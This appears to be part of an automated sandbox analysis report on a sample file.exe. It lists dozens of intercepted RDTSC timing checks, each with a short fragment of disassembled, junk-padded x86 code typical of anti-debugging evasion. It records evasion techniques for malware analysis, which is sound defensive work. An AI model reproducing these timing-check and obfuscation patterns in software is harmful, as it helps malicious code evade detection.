                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B135D second address: 10B1361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1361 second address: 10B13CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, dx 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F86385196D8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D3688h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F86385196D8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a jnp 00007F86385196D6h 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 push edx 0x00000054 ja 00007F86385196D6h 0x0000005a pop edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B13CE second address: 10B13D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2A1E second address: 10B2A73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F86385196DBh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F86385196E5h 0x00000011 nop 0x00000012 jmp 00007F86385196E0h 0x00000017 push 00000000h 0x00000019 mov esi, edi 0x0000001b push 00000000h 0x0000001d ja 00007F86385196D6h 0x00000023 or esi, dword ptr [ebp+122D3884h] 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c jnp 00007F86385196D8h 0x00000032 push ecx 0x00000033 pop ecx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2A73 second address: 10B2A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B27CF second address: 10B27D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2A79 second address: 10B2A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2A7D second address: 10B2A95 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnl 00007F86385196D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2A95 second address: 10B2A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B354F second address: 10B35ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F86385196D8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 jmp 00007F86385196E2h 0x0000002d mov si, 8200h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F86385196D8h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d push 00000000h 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 call 00007F86385196D8h 0x00000057 pop esi 0x00000058 mov dword ptr [esp+04h], esi 0x0000005c add dword ptr [esp+04h], 00000015h 0x00000064 inc esi 0x00000065 push esi 0x00000066 ret 0x00000067 pop esi 0x00000068 ret 0x00000069 mov esi, 1685D35Bh 0x0000006e xchg eax, ebx 0x0000006f push eax 0x00000070 push edx 0x00000071 jng 00007F86385196E2h 0x00000077 jmp 00007F86385196DCh 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B80B4 second address: 10B80D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F863914EA2Ch 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9F58 second address: 10B9FFC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F86385196D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F86385196D8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 jl 00007F86385196DCh 0x0000002d mov ebx, dword ptr [ebp+122D3614h] 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D374Ch] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007F86385196D8h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 jmp 00007F86385196E8h 0x0000005c jmp 00007F86385196E3h 0x00000061 xchg eax, esi 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F86385196E0h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC028 second address: 10BC02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB195 second address: 10BB1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F86385196DCh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BCEAC second address: 10BCEB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BCEB2 second address: 10BCF1A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F86385196EEh 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D1D5Dh], edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F86385196D8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000000h 0x00000034 and bh, FFFFFF92h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a je 00007F86385196DCh 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BCF1A second address: 10BCF1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BEF5B second address: 10BEF60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE06B second address: 10BE071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BFF06 second address: 10BFF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3137 second address: 10C3145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F863914EA2Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AE33 second address: 106AE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AE37 second address: 106AE68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA36h 0x00000007 jmp 00007F863914EA2Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F863914EA2Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C37CD second address: 10C37D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C37D1 second address: 10C37DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C37DB second address: 10C382A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, 4A41D8A2h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+1244E921h], ecx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F86385196D8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 xchg eax, esi 0x00000034 jmp 00007F86385196DCh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push ecx 0x0000003e pop ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C382A second address: 10C382F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5F02 second address: 10C5F69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a and edi, dword ptr [ebp+122D1B4Dh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F86385196D8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F86385196D8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 push eax 0x00000049 pushad 0x0000004a jns 00007F86385196D8h 0x00000050 push eax 0x00000051 push edx 0x00000052 push edx 0x00000053 pop edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C39A0 second address: 10C39A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C39A4 second address: 10C39A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C39A8 second address: 10C39B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F863914EA26h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C0125 second address: 10C0129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3A72 second address: 10C3A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F863914EA2Ch 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C60C9 second address: 10C60CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7F61 second address: 10C7F66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C71FD second address: 10C7201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7201 second address: 10C7207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7207 second address: 10C721C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86385196E1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C721C second address: 10C7220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D15E4 second address: 10D15EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0E42 second address: 10D0E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F863914EA26h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F863914EA2Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0E5F second address: 10D0E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0E69 second address: 10D0E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F863914EA26h 0x0000000a jmp 00007F863914EA35h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D1006 second address: 10D100B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D100B second address: 10D1027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jng 00007F863914EA41h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F863914EA2Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3C28 second address: 10D3C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F86385196D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3C35 second address: 10D3C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7802 second address: 10D7808 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7808 second address: 10D7823 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F863914EA2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F863914EA30h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7823 second address: 10D7854 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F86385196E3h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F86385196DFh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7854 second address: 10D7858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7858 second address: 10D7877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F86385196E2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D795E second address: 10D7964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7964 second address: 10D799B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F86385196DAh 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F86385196DFh 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jg 00007F86385196D6h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE309 second address: 10DE326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA39h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE326 second address: 10DE330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE330 second address: 10DE334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE334 second address: 10DE36E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F86385196E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jp 00007F86385196D6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 jns 00007F86385196D6h 0x0000001d jmp 00007F86385196DEh 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DEBEE second address: 10DEBFE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F863914EA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DEBFE second address: 10DEC12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DED84 second address: 10DED8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DED8A second address: 10DEDBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F86385196E9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DEF65 second address: 10DEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DEF69 second address: 10DEF7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DF22C second address: 10DF23C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F863914EA2Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DF23C second address: 10DF242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DF242 second address: 10DF25E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F863914EA31h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4142 second address: 10E4146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4146 second address: 10E4169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA39h 0x00000007 ja 00007F863914EA26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4169 second address: 10E4175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F86385196D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4175 second address: 10E4179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4179 second address: 10E418D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F86385196D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F86385196D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4307 second address: 10E430D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E430D second address: 10E431E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jl 00007F86385196D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E431E second address: 10E432C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E432C second address: 10E4337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4337 second address: 10E4345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4484 second address: 10E4488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4488 second address: 10E4494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F863914EA26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E47BA second address: 10E47D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F86385196E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E47D6 second address: 10E47DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E495D second address: 10E4967 instructions: 0x00000000 rdtsc 0x00000002 js 00007F86385196D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
